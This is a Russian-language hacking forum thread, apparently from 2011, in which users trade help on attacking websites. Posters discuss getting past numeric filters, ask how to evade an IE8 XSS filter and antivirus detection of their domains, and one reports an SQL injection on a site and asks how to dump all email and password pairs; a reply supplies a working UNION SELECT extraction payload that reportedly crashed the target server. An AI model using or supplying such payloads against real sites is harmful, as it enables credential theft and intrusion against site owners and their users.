 |
|

08.08.2011, 15:36
|
|
Новичок
Регистрация: 01.08.2011
Сообщений: 0
Провел на форуме: 0
Репутация:
0
|
|
хмм как нету? после второго значения лимита можно свой запрос добавить не?
|
|
|

08.08.2011, 15:41
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от nikon2k
хмм как нету? после второго значения лимита можно свой запрос добавить не?
Можно, но он фильтруется. К примеру ф-цией intval().
|
|
|

08.08.2011, 15:43
|
|
Новичок
Регистрация: 01.08.2011
Сообщений: 0
Провел на форуме: 0
Репутация:
0
|
|
а с char() тоже не получится?
|
|
|

08.08.2011, 15:45
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме: 195266
Репутация:
53
|
|
Сообщение от nikon2k
хмм как нету? после второго значения лимита можно свой запрос добавить не?
можно всё что хочешь туда добавить, но как сказали выше - там стоит фильтр. Что-то типа /\d+/ или же (int)$_GET['some_param']. А ранее проверяется на вхождение в строку кавычки.
upd.
Сообщение от None
а с char() тоже не получится?
ты к нормальной("существующей") странице добавь какие-нить буквы/символы. Если отображается всё тоже самое, то там стоит фильтр.
|
|
|

08.08.2011, 15:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от nikon2k
а с char() тоже не получится?
Фильтр пропускает только числа.
http://gigwarez.ru/page/12,34,45/ => 12
http://gigwarez.ru/page/12blabla/ => 12
|
|
|

08.08.2011, 21:19
|
|
Новичок
Регистрация: 05.03.2007
Сообщений: 3
Провел на форуме: 66211
Репутация:
35
|
|
Код:
http://site.ru/?a=10\"
1)как обойти в данном случае фильтр на сервере? Пробел не проходит (точнее не фильтр, а какая то странная ошибка c обрубанием ссылки после пробела и вывода текста: [Bad Request
Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.]
Вариант замены пробела на "/" или "/**/" не проходит в chrome, что обидно Во всех остальных браузерах срабатывает.
2) как обойти xss фильтр в IE8 в данном случае?
3) как обойти в данном случае антивирус ESET Nod 32? На домены вида *.co.cc он ругается
Подскажите варианты
P.S. Также нельзя использовать ";", возможно ещё что-то.
|
|
|

09.08.2011, 00:44
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести всю нужную информацию, а не только часть?
Пример запроса:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
|
|
|

09.08.2011, 00:48
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от mix0x0
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести
всю
нужную информацию, а не только часть?
Пример запроса
:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
Код:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
|
|
|

09.08.2011, 01:06
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме: 0
Репутация:
0
|
|
Сообщение от Expl0ited
Код:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
|
|
|

09.08.2011, 01:10
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме: 262707
Репутация:
935
|
|
Сообщение от mix0x0
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
Получаемый массив данных не должен превышать одного мегабайта, иначе тянуть только стандартными методами.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|